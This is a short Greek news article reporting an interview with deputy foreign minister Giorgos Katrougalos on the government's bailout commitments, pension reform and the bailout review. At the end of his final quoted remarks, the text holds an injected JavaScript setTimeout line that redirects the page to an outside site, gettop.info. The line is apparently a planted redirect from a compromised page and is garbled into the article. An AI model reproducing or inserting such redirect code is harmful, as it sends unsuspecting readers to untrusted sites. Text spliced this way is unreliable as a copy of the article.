Κατρούγκαλος για «μποναμά»: Δεν είχαμε υποχρέωση να πάρουμε την άδεια, υπήρχε μόνο ενημέρωση

0
9

 

Σε συνέντευξή του στην τηλεόραση του ΣΚΑΪ, ο αναπληρωτής υπ. Εξωτερικών Γιώργος Κατρούγκαλος επανέλαβε τη δέσμευση της κυβέρνησης να τηρήσει όσες δεσμεύσεις έχει λάβει «ακόμα και εκεί που δεν μας βρίσκουν σύμφωνους ιδεολογικά γιατί έχουν την υπογραφή μας από κάτω».

Όπως σημείωσε ο κ. Κατρούγκαλος «η κυβέρνηση θα προσπαθήσει να εξουδετερώσει όσες δεσμεύσεις είναι ακραία νεοφιλελεύθερες με δικής μας έμπνευσης μέτρα». Αναφερόμενος στις εξαγγελίες Τσίπρα, εξέφρασε την άποψη ότι «δεν είχαμε υποχρέωση να πάρουμε την άδεια, υπήρχε μόνο ενημέρωση».

Επιπλέον, επέμεινε ότι το ασφαλιστικό έχει κλείσει παρά το γεγονός ότι ΔΝΤ και γερμανικό ΥΠΟΙΚ επιμένουν στο θέμα αυτό: «Πρόκειται για ακραίους παίχτες που είτε είναι σημαιοφόροι του νεοφιλελευθερισμού όπως το ταμείο είτε ευαγγελίζονται ίσως ακόμα εξόδους από το ευρώ και μικρότερη ευρωζώνη».

Επίσης, συμπλήρωσε: «Η μια έχει απέχθεια σε ό,τι είναι αριστερό σε διακυβέρνηση στην Ευρώπη και γι αυτό η κεντροαριστερά στην Ευρώπη οργανώνει μια κοινή στρατηγική και η δεύτερη έχει να κάνει με την ιδεολογία του κ. Σόιμπλε που θέλει την ευρωζώνη μικρότερη, μια πυρηνική ευρωζώνη».

Για την αξιολόγηση υποστήριξε ότι «υπάρχουν ακραίοι πολιτικοί κύκλοι που δεν θέλουν να κλείσει η αξιολόγηση αλλά εγώ από την εμπειρία που είχα συνοδεύοντας τον πρωθυπουργό στην Ευρώπη και τον Πρόεδρο της Δημοκρατίας διαπιστώνω ότι μια διαφορά σε σχέση με το παρελθόν είναι ότι ο Σόιμπλε δεν έχει την πλειοψηφία στην ΕΕ αλλά ελέγχει το Eurogroup που δεν είναι θεσμικό όργανο. Aυτή είναι η διαφορά και γι’ αυτό η αξιολόγηση θα κλείσει». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here